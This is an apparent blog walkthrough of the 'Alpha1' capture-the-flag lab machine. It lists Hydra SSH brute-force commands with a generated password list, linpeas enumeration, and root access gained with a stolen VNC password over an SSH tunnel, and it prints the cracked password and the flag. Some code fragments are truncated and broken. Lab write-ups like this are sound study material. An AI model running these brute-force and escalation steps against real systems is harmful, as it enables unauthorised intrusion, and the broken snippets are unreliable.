How I took down Alpha1 Machine


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Easy/Medium

If you know how to do ssh tunneling and know what is 'BrainFuck'. I think you are good to go.


You can download the machine from here.


Information Gathering & Scanning Process:

IP:  (which spits out by machine and we do not need to search for it)


Since I know the machine IP address, I went ahead to do some manual assessment while running the following command (which helps to collects pretty much everything I required to know about this machine)


All those list of sub-directories were bogus but at the bottom, I noticed a strange character..


Initially I thought it was some kind of encrypted code but later I came to under it is another programming language called ‘BrainFuck’.

I used this link to convert the string.

Value we got:/alfa-support




Password Pattern: pet followed by 3 numerical digits.   

  <—————————– Let’s keep all the above steps within stage 1.  —————————–>


<————————————————– Stage 2 Begins  —————————–———————>


cat _full_tcp_nmap.txt | less

username: anonymous
password: anonymous 
cd thomas
get milo.jpg

exiftool milo.jpg (didn't find anything useful)

From stage 1, we can conclude that the pet’s name is milo.

Password pattern is milo$i$j$k    ($i$j$k represents three digits)

Let’s write a script to prepare a list of password.

vim script.sh

for i in {0..9}; do
    for j in {0..9}; do 
        for k in {0..9}; do 
            echo "milo$i$j$k" >> password.txt
chmod +x script.sh./script.sh

I tried a python script for the task 🙂

import sys
with open('password.txt', 'w') as f:
sys.stdout = f 
for i in range(1, 10): 
    for j in range(1, 10):
        for k in range(1,10):

Brute Force SSH using Hydra

hydra -l thomas -P password.txt -s 65111 ssh://

username: thomas
password: milo666

cat _full_tcp_nmap.txt | less


ssh thomas@ -p 65111

user_flag==>> M4Mh5FX8EGGGSV6CseRuyyskG   (Solution 1)

scp -P 65111 thomas@ .          #Saved Remote File (Keep in mind)

I tried to perform file, strings, cat, binwalk etc.. no use lol

I tried to evaluate the target machine with the help of linpea.sh program 

Miscellaneous Steps :

On Kali Machine:  
cd /path-to-linpea.sh/
python3 -m http.server 

On Target or Victim Machine: 
cd /tmp
chmod +x linpea.sh 
sh linpea.sh
Click on Image to View in HD

Port 5901

We have password from the above information. Do you remember this file .remote_secret ?

vncviewer -passwd .remote_secret

I think I need to port forward or bind (like ssh tunneling). Let’s do some googling

ssh -p 65111 -L 5901:localhost:5901 thomas@

vncviewer -passwd .remote_secret localhost:5901

Viola!!  We got the root flag as well as root access 🙂




Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Back to top button